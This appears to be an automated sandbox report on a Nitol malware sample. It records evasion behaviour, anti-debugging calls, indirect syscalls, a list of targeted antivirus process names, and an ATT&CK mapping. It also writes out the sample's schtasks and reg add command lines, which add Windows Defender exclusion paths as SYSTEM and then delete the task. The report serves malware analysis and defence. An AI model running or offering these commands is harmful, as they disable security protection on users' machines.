Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe TID: 2500	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe TID: 3244	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe TID: 5932	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_00007FFE1A51A1B8 FindFirstFileExW,

4_2_00007FFE1A51A1B8

Source: C:\Users\user\Documents\RgZ5EJ.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: 149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: YYAfLM.exe, 00000027.00000002.3580652851.0000000001579000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 149876985-734579485.05.exe, 00000000.00000003.2170680198.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, 149876985-734579485.05.exe, 00000000.00000003.2195680697.00000000005F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd

Source: C:\Users\user\Documents\RgZ5EJ.exe	API call chain: ExitProcess graph end node			graph_4-14018
Source: C:\Users\user\Documents\RgZ5EJ.exe	API call chain: ExitProcess graph end node			graph_4-14362

Source: C:\Users\user\Desktop\149876985-734579485.05.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_00000001400073E0 LdrLoadDll,

4_2_00000001400073E0

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0000000140007C91

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Code function: 39_3_018300CD mov eax, dword ptr fs:[00000030h]	39_3_018300CD
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Code function: 39_3_018300CD mov eax, dword ptr fs:[00000030h]	39_3_018300CD
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Code function: 39_3_01830643 mov eax, dword ptr fs:[00000030h]	39_3_01830643
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Code function: 39_3_01830643 mov eax, dword ptr fs:[00000030h]	39_3_01830643

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

4_2_0000000140004630

Source: C:\Users\user\Documents\RgZ5EJ.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0000000140007C91
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00000001400106B0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,	4_2_00000001400092E0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00007FFE1A5176E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE1A5176E0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00007FFE1A511F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFE1A511F50
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00007FFE1A512630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE1A512630
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Code function: 41_2_002C2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_002C2AE2
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Code function: 41_2_002C10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_002C10CC
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Code function: 41_2_002C51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_002C51FB

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\RgZ5EJ.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Desktop\149876985-734579485.05.exe	NtDelayExecution: Indirect: 0x1F9AD7	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	NtProtectVirtualMemory: Indirect: 0x29DB253	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	NtProtectVirtualMemory: Indirect: 0x2ADB253	Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Program Files (x86)\YYAfLM\YYAfLM.exe "C:\Program Files (x86)\YYAfLM\YYAfLM.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: 149876985-734579485.05.exe

Binary or memory string: CpodFrame*CLOCKPOD.EXEWindowsScreenSaverClass#32768HookSwitchCLOCKPOD64.DLLInitCommonControlsInitCommonControlsExCOMCTL32.DLLSysMonthCal32Shell_NotifyIconWSHELL32.DLLGetDpiForMonitorshcore.dllMonitorFromWindowControl Panel\Desktop\WindowMetricsCaptionFontGetMonitorInfoWProgmanShell_TrayWndDwmIsCompositionEnabledDwmGetColorizationColordwmapi.dll1RASHANGUP1RAS<DoDisconnect:<Connect:%s/%s><Connect:<Disconnect:UnknownUser eventCustom eventType specific eventDevice is goneAbout to removeRemoval abortedWants to remove, may failDetected a new deviceCONFIGMG privateLow disk spaceNo disk spaceVolLockUnlockFailedVolLockLockReleasedVolLockQueryUnlockVolLockLockFailedVolLockLockTakenVolLockQueryLockCONFIGMG vxdCONFIGMG api32Shell logonMonitorChangeConfigChangeCanceledConfigChangedQueryChangeConfigDevnodes changedAPPYENDAPPYBEGINh

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_00007FFE1A51FD40 cpuid

4_2_00007FFE1A51FD40

Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: GetLocaleInfoA,		4_2_000000014000F370
Source: C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe	Code function: GetLocaleInfoA,		41_2_002C6B1A

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_000000014000A370

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

4_2_0000000140005A70

Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: YYAfLM.exe, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: RgZ5EJ.exe, 00000004.00000002.2332211101.00000000027A8000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3582165592.0000000003B7D000.00000002.00001000.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 39.2.YYAfLM.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.YYAfLM.exe.4ca03e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.YYAfLM.exe.4ca03e8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYAfLM.exe PID: 5212, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 39.2.YYAfLM.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.YYAfLM.exe.4ca03e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.YYAfLM.exe.4ca03e8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YYAfLM.exe PID: 5212, type: MEMORYSTR

Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,		4_2_00000001400042B0
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		4_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	113 Command and Scripting Interpreter	33 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
